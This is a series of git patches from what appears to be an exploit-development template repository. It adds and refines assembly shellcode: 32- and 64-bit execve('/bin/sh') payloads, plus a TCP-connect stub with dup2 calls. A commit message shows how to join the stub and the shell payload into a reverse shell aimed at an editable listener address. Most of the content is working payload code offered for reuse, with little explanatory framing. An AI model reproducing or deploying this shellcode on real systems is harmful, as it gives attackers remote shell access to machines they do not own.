From c41649b5077eb3e0d66043658df8bccbdfef0f1a Mon Sep 17 00:00:00 2001 From: Malfurious Date: Sat, 24 Dec 2022 07:50:44 -0500 Subject: shellcode: Move example code to a new directory This is mainly done to keep the top working directory (where the Makefile lives) cleaner. Signed-off-by: Malfurious --- templates/shellcode/examples/shell32.asm | 15 +++++++++++++++ templates/shellcode/examples/shell64.asm | 16 ++++++++++++++++ 2 files changed, 31 insertions(+) create mode 100644 templates/shellcode/examples/shell32.asm create mode 100644 templates/shellcode/examples/shell64.asm (limited to 'templates/shellcode/examples') diff --git a/templates/shellcode/examples/shell32.asm b/templates/shellcode/examples/shell32.asm new file mode 100644 index 0000000..5ff2e12 --- /dev/null +++ b/templates/shellcode/examples/shell32.asm @@ -0,0 +1,15 @@ +[SECTION .text] +global _start + +; https://www.exploit-db.com/shellcodes/46809 + +_start: + xor ecx, ecx + xor edx, edx + push 0xb + pop eax + push ecx + push 0x68732f2f + push 0x6e69622f + mov ebx, esp + int 0x80 diff --git a/templates/shellcode/examples/shell64.asm b/templates/shellcode/examples/shell64.asm new file mode 100644 index 0000000..2353b6f --- /dev/null +++ b/templates/shellcode/examples/shell64.asm @@ -0,0 +1,16 @@ +[SECTION .text] +global _start + +; https://www.exploit-db.com/shellcodes/47008 + +_start: + xor rsi, rsi + xor rdx, rdx + push rsi + mov rdi, 0x68732f2f6e69622f + push rdi + push rsp + pop rdi + mov al, 0x3b + cdq + syscall -- cgit v1.2.3 From f21e743212f02dbfb560fa74d983a7e156722d11 Mon Sep 17 00:00:00 2001 From: Malfurious Date: Sun, 15 Jan 2023 08:06:42 -0500 Subject: shellcode: Update /bin/sh shellcodes The shell-spawning shellcodes are rewritten to address the following concerns: - The array parameters to execve are now set properly, to valid arrays on the stack, instead of NULL pointers. - The cdq instruction is no longer used to sign-extend the rax register, since it has not been producing the expected results in gdb. - Labels, sections, and other file metadata are removed in order to support concatenation of shellcode samples to make more complex code. Signed-off-by: Malfurious --- templates/shellcode/examples/shell32.asm | 29 ++++++++++++------------- templates/shellcode/examples/shell64.asm | 36 +++++++++++++++++++------------- 2 files changed, 37 insertions(+), 28 deletions(-) (limited to 'templates/shellcode/examples') diff --git a/templates/shellcode/examples/shell32.asm b/templates/shellcode/examples/shell32.asm index 5ff2e12..6238469 100644 --- a/templates/shellcode/examples/shell32.asm +++ b/templates/shellcode/examples/shell32.asm @@ -1,15 +1,16 @@ -[SECTION .text] -global _start +; Originally based on https://www.exploit-db.com/shellcodes/46809 +; See shell64.asm for more details. -; https://www.exploit-db.com/shellcodes/46809 - -_start: - xor ecx, ecx - xor edx, edx - push 0xb - pop eax - push ecx - push 0x68732f2f - push 0x6e69622f - mov ebx, esp - int 0x80 +; execve("/bin/sh", ["/bin/sh"], []) +xor eax, eax +xor ecx, ecx +push ecx +push 0x68732f2f +push 0x6e69622f +mov ebx, esp +push ecx +mov edx, esp +push ebx +mov ecx, esp +mov al, 11 +int 0x80 diff --git a/templates/shellcode/examples/shell64.asm b/templates/shellcode/examples/shell64.asm index 2353b6f..3812c33 100644 --- a/templates/shellcode/examples/shell64.asm +++ b/templates/shellcode/examples/shell64.asm @@ -1,16 +1,24 @@ -[SECTION .text] -global _start +; Originally based on https://www.exploit-db.com/shellcodes/47008 -; https://www.exploit-db.com/shellcodes/47008 +; stack layout +; +; ┏━━━━━━━━━━━━━━┓ +; ┃ v +; [ argv0, NULL ] "/bin//sh" NULL +; ^ ^ ^ +; ┃ ┃ ┃ +; argv envp filename -_start: - xor rsi, rsi - xor rdx, rdx - push rsi - mov rdi, 0x68732f2f6e69622f - push rdi - push rsp - pop rdi - mov al, 0x3b - cdq - syscall +; execve("/bin/sh", ["/bin/sh"], []) +xor rax, rax +xor rsi, rsi +mov rdi, 0x68732f2f6e69622f +push rsi +push rdi +mov rdi, rsp +push rsi +mov rdx, rsp +push rdi +mov rsi, rsp +mov al, 59 +syscall -- cgit v1.2.3 From 1418eaf3054967f1d9856279f1988279c1009ba1 Mon Sep 17 00:00:00 2001 From: Malfurious Date: Sun, 15 Jan 2023 09:29:14 -0500 Subject: shellcode: Add sample for connecting a TCP socket This sample can be used to create a reverse shell when combined with the shell64 sample: cat examples/{tcp64,shell64}.asm >code.asm make ... Signed-off-by: Malfurious --- templates/shellcode/examples/tcp64.asm | 49 ++++++++++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 templates/shellcode/examples/tcp64.asm (limited to 'templates/shellcode/examples') diff --git a/templates/shellcode/examples/tcp64.asm b/templates/shellcode/examples/tcp64.asm new file mode 100644 index 0000000..1ec3bc8 --- /dev/null +++ b/templates/shellcode/examples/tcp64.asm @@ -0,0 +1,49 @@ +; Based loosely on https://systemoverlord.com/2018/10/30/understanding-shellcode-the-reverse-shell.html + +; socket(AF_INET, SOCK_STREAM, IPPROTO_IP) +xor rax, rax +xor rdi, rdi +xor rsi, rsi +xor rdx, rdx +mov al, 41 +mov dil, 2 +mov sil, 1 +syscall + +; !! Edit this section to connect back to your listener !! +; +; struct sockaddr_in { // Struct size: 16 +; short int sin_family; // AF_INET (2) +; unsigned short int sin_port; // Set to 8080 below +; struct in_addr sin_addr; // Set to 127.0.0.1 below +; unsigned char sin_zero[8]; +; }; +; +; struct in_addr { // Struct size: 4 +; uint32_t s_addr; +; }; +xor rbx, rbx +push rbx +mov rbx, 0x0100007f901f0002 +push rbx + +; connect(fd, sockaddr, sizeof sockaddr) +mov rdi, rax +mov rsi, rsp +mov dl, 16 +xor rax, rax +mov al, 42 +syscall + +; dup2(fd, stdin) +; dup2(fd, stdout) +; dup2(fd, stderr) +xor rsi, rsi +mov al, 33 +syscall +mov sil, 1 +mov al, 33 +syscall +mov sil, 2 +mov al, 33 +syscall -- cgit v1.2.3